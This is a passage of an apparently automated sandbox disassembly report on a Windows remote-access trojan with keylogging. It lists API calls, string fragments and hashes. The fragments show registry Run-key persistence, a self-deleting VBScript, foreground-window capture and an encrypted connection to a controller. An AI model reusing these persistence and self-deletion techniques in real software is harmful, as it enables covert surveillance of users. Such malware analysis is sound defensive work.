                                control_flow_graph 996 40d096-40d0ac call 412850 999 40d0b8-40d0c1 996->999 1000 40d0ae-40d0b3 call 40b8ac 996->1000 1002 40d0c3 call 419a94 999->1002 1003 40d0c8-40d0cf 999->1003 1000->999 1002->1003 1005 40d0d1-40d0dd call 401f04 call 41c291 1003->1005 1006 40d0e2-40d0f2 1003->1006 1005->1006 1008 40d0f4-40d103 call 401f04 call 413a23 1006->1008 1009 40d109-40d114 1006->1009 1024 40d108 1008->1024 1010 40d116-40d122 call 401f04 call 413a23 1009->1010 1011 40d128-40d12e 1009->1011 1028 40d127 1010->1028 1016 40d130-40d144 call 401f04 call 413a23 1011->1016 1017 40d145-40d199 call 436e90 call 40247c call 401fab * 2 call 4136f8 1011->1017 1016->1017 1038 40d1ab-40d1d9 call 401fab RegDeleteKeyA call 4077b7 1017->1038 1039 40d19b-40d1a5 GetModuleFileNameW 1017->1039 1024->1009 1028->1011 1044 40d1ea-40d2af SetFileAttributesW call 41b978 call 41bc5e call 403014 call 401f09 call 401fd8 call 43c0cf call 40417e call 403014 call 40431d call 401f09 * 2 call 40417e call 4042fc call 401f09 1038->1044 1045 40d1db-40d1e8 call 401f04 SetFileAttributesW 1038->1045 1039->1038 1076 40d2b1-40d303 call 40417e call 4042fc call 403014 call 40325d call 401f09 * 3 1044->1076 1077 40d308-40d362 call 40417e call 403014 * 2 call 40325d call 401f09 * 3 1044->1077 1045->1044 1076->1077 1105 40d372-40d382 call 4077b7 1077->1105 1106 40d364-40d36d call 409052 1077->1106 1110 40d3c1-40d3fd call 409052 call 401f04 call 40247c call 401f04 call 41c3f1 1105->1110 1111 40d384-40d3bc call 40b97c call 403014 call 40325d call 401f09 * 2 1105->1111 1106->1105 1131 40d418-40d419 ExitProcess 1110->1131 1132 40d3ff-40d412 call 401f04 ShellExecuteW 1110->1132 1111->1110 1132->1131
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,Pj,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Pj$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hdF$hpF$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2351991084
                                • Opcode ID: 14986363c28eb5bf87fb1fe0f5b02e3cdd437185146d2719f14acd65f79ffd4a
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 14986363c28eb5bf87fb1fe0f5b02e3cdd437185146d2719f14acd65f79ffd4a
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A726 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 163sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                                • String ID: 8SG$8SG$hdF$pQG$pQG$PG$PG
                                • API String ID: 110482706-4009011672
                                • Opcode ID: 1b86f33e2813ac9ce889fc21d85687f64281119cd91f5dea58d0e0166611a616
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 1b86f33e2813ac9ce889fc21d85687f64281119cd91f5dea58d0e0166611a616
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1233 4048c8-4048e8 connect 1234 404a1b-404a1f 1233->1234 1235 4048ee-4048f1 1233->1235 1238 404a21-404a2f WSAGetLastError 1234->1238 1239 404a97 1234->1239 1236 404a17-404a19 1235->1236 1237 4048f7-4048fa 1235->1237 1240 404a99-404a9e 1236->1240 1241 404926-404930 call 420c60 1237->1241 1242 4048fc-404923 call 40531e call 402093 call 41b4ef 1237->1242 1238->1239 1243 404a31-404a34 1238->1243 1239->1240 1255 404941-40494e call 420e8f 1241->1255 1256 404932-40493c 1241->1256 1242->1241 1245 404a71-404a76 1243->1245 1246 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1243->1246 1248 404a7b-404a94 call 402093 * 2 call 41b4ef 1245->1248 1246->1239 1248->1239 1265 404950-404973 call 402093 * 2 call 41b4ef 1255->1265 1266 404987-404992 call 421a40 1255->1266 1256->1248 1295 404976-404982 call 420ca0 1265->1295 1279 4049c4-4049d1 call 420e06 1266->1279 1280 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1266->1280 1292 4049d3-4049f6 call 402093 * 2 call 41b4ef 1279->1292 1293 4049f9-404a14 CreateEventW * 2 1279->1293 1280->1295 1292->1293 1293->1236 1295->1239
                                APIs
                                • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-2151626615
                                • Opcode ID: fa9dc16280b74e41472a6a3d9ec0168782aacc7c5f81dfffe069f112667f44de
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: fa9dc16280b74e41472a6a3d9ec0168782aacc7c5f81dfffe069f112667f44de
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                • GetForegroundWindow.USER32 ref: 0040AD49
                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: 0353f8177fafd3cd9a3a1f2f9d997a593271c35778fb8a74e0f6d4403574b366
                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                • Opcode Fuzzy Hash: 0353f8177fafd3cd9a3a1f2f9d997a593271c35778fb8a74e0f6d4403574b366
                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1472 40da34-40da59 call 401f86 1475 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1472->1475 1476 40da5f 1472->1476 1500 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1475->1500 1477 40da70-40da7e call 41b5b4 call 401f13 1476->1477 1478 40da91-40da96 1476->1478 1479 40db51-40db56 1476->1479 1480 40daa5-40daac call 41bfb7 1476->1480 1481 40da66-40da6b 1476->1481 1482 40db58-40db5d 1476->1482 1483 40da9b-40daa0 1476->1483 1484 40db6e 1476->1484 1485 40db5f-40db64 call 43c0cf 1476->1485 1503 40da83 1477->1503 1487 40db73-40db78 call 43c0cf 1478->1487 1479->1487 1501 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1480->1501 1502 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1480->1502 1481->1487 1482->1487 1483->1487 1484->1487 1492 40db69-40db6c 1485->1492 1497 40db79-40db7e call 409057 1487->1497 1492->1484 1492->1497 1497->1475 1501->1503 1509 40da87-40da8c call 401f09 1502->1509 1503->1509 1509->1475
                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: aa652be1f29e0a7c33d43a87d655e5c017c40b6912c980d0cec9b2528de70772
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: aa652be1f29e0a7c33d43a87d655e5c017c40b6912c980d0cec9b2528de70772
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1636 41c3f1-41c402 1637 41c404-41c407 1636->1637 1638 41c41a-41c421 1636->1638 1639 41c410-41c418 1637->1639 1640 41c409-41c40e 1637->1640 1641 41c422-41c43b CreateFileW 1638->1641 1639->1641 1640->1641 1642 41c441-41c446 1641->1642 1643 41c43d-41c43f 1641->1643 1645 41c461-41c472 WriteFile 1642->1645 1646 41c448-41c456 SetFilePointer 1642->1646 1644 41c47f-41c484 1643->1644 1648 41c474 1645->1648 1649 41c476-41c47d FindCloseChangeNotification 1645->1649 1646->1645 1647 41c458-41c45f CloseHandle 1646->1647 1647->1643 1648->1649 1649->1644
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                • String ID: hpF
                                • API String ID: 1087594267-151379673
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1650 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1661 41b35d-41b366 1650->1661 1662 41b31c-41b32b call 4135a6 1650->1662 1663 41b368-41b36d 1661->1663 1664 41b36f 1661->1664 1667 41b330-41b347 call 401fab StrToIntA 1662->1667 1666 41b374-41b37f call 40537d 1663->1666 1664->1666 1672 41b355-41b358 call 401fd8 1667->1672 1673 41b349-41b352 call 41cf69 1667->1673 1672->1661 1673->1672
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-2070987746
                                • Opcode ID: 8ad9b4a9319c0ce8e08ab0eef02bf2d7836f92b3666c7b1e2c0131a55ef00c42
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: 8ad9b4a9319c0ce8e08ab0eef02bf2d7836f92b3666c7b1e2c0131a55ef00c42
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                                • String ID: XQG
                                • API String ID: 4068920109-3606453820
                                • Opcode ID: c123891714ba34b2fc86ee474269cf7d4a952ef3128b037d3b88976122030326
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: c123891714ba34b2fc86ee474269cf7d4a952ef3128b037d3b88976122030326
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: 21aa211e1a7797fa89a1b10c2aaeaa18a9433730dc686852439f38efa4a59002
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: 21aa211e1a7797fa89a1b10c2aaeaa18a9433730dc686852439f38efa4a59002
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 4ca78bee1b29c2b2eaf028355388d4b479c826490612efa5b39e4efab7956beb
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: 4ca78bee1b29c2b2eaf028355388d4b479c826490612efa5b39e4efab7956beb
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-1507639952
